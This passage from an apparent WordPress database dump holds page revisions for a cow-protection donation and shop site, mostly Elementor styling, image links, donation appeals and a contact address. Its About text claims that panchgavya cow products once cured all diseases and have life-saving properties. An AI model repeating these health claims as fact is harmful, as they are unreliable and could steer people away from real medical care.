href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-14 14:52:11','2022-10-14 09:22:11','',1373,'https://gopalak.in/?p=1782',0,'revision','',0),(1783,1,'2022-10-14 14:52:11','2022-10-14 09:22:11','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-14 14:52:11','2022-10-14 09:22:11','',1373,'https://gopalak.in/?p=1783',0,'revision','',0),(1784,1,'2022-10-14 14:54:01','2022-10-14 09:24:01','https://gopalak.in/wp-content/uploads/2022/10/cropped-logo1211.png','cropped-logo1211.png','','inherit','open','closed','','cropped-logo1211-png','','','2022-10-14 14:54:01','2022-10-14 09:24:01','',0,'https://gopalak.in/wp-content/uploads/2022/10/cropped-logo1211.png',0,'attachment','image/png',0),(1786,1,'2022-10-14 14:57:48','2022-10-14 09:27:48','','cattle','','publish','closed','closed','','cattle','','','2022-10-14 14:57:48','2022-10-14 09:27:48','',0,'https://gopalak.in/?post_type=product&#038;p=1786',0,'product','',0),(1790,1,'2022-10-14 17:13:25','2022-10-14 11:43:25','<!-- Code is poetry -->','cattle feed','','publish','closed','closed','','cattle-feed','','','2022-10-14 17:23:44','2022-10-14 11:53:44','',0,'https://gopalak.in/?post_type=campaign&#038;p=1790',0,'campaign','',0),(1792,1,'2022-10-14 17:19:03','0000-00-00 00:00:00','','Auto Draft','','draft','closed','closed','','','','','2022-10-14 17:19:03','2022-10-14 11:49:03','',0,'https://gopalak.in/?page_id=1792',0,'page','',0),(1793,1,'2022-10-14 17:16:53','2022-10-14 11:46:53','','Elementor #1792','','inherit','closed','closed','','1792-revision-v1','','','2022-10-14 17:16:53','2022-10-14 11:46:53','',1792,'https://gopalak.in/?p=1793',0,'revision','',0),(1794,1,'2022-10-14 17:21:19','2022-10-14 11:51:19','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n			<a href=\"#\" role=\"button\">\n						Donate\n					</a>\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>','Adopt/Donate','','inherit','closed','closed','','1626-revision-v1','','','2022-10-14 17:21:19','2022-10-14 11:51:19','',1626,'https://gopalak.in/?p=1794',0,'revision','',0),(1795,1,'2022-10-14 17:21:19','2022-10-14 11:51:19','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n			<a href=\"#\" role=\"button\">\n						Donate\n					</a>\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>','Adopt/Donate','','inherit','closed','closed','','1626-revision-v1','','','2022-10-14 17:21:19','2022-10-14 11:51:19','',1626,'https://gopalak.in/?p=1795',0,'revision','',0),(1796,1,'2022-10-14 17:21:20','2022-10-14 11:51:20','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n			<a href=\"https://gopalak.in/campaigns/cattle-feed/\" role=\"button\">\n						Donate\n					</a>\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>','Adopt/Donate','','inherit','closed','closed','','1626-revision-v1','','','2022-10-14 17:21:20','2022-10-14 11:51:20','',1626,'https://gopalak.in/?p=1796',0,'revision','',0),(1800,1,'2022-10-17 09:56:49','0000-00-00 00:00:00','','Elementor #1800','','draft','closed','closed','','','','','2022-10-17 09:56:49','2022-10-17 04:26:49','',0,'https://gopalak.in/?page_id=1800',0,'page','',0),(1801,1,'2022-10-17 09:36:31','2022-10-17 04:06:31','','Elementor #1800','','inherit','closed','closed','','1800-revision-v1','','','2022-10-17 09:36:31','2022-10-17 04:06:31','',1800,'https://gopalak.in/?p=1801',0,'revision','',0),(1802,1,'2022-10-17 10:10:08','2022-10-17 04:40:08','','Elementor #1802','','publish','closed','closed','','elementor-1802','','','2022-10-17 10:10:09','2022-10-17 04:40:09','',0,'https://gopalak.in/?page_id=1802',0,'page','',0),(1803,1,'2022-10-17 09:58:37','2022-10-17 04:28:37','','Elementor #1802','','inherit','closed','closed','','1802-revision-v1','','','2022-10-17 09:58:37','2022-10-17 04:28:37','',1802,'https://gopalak.in/?p=1803',0,'revision','',0),(1804,1,'2022-10-17 10:26:25','2022-10-17 04:56:25','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.e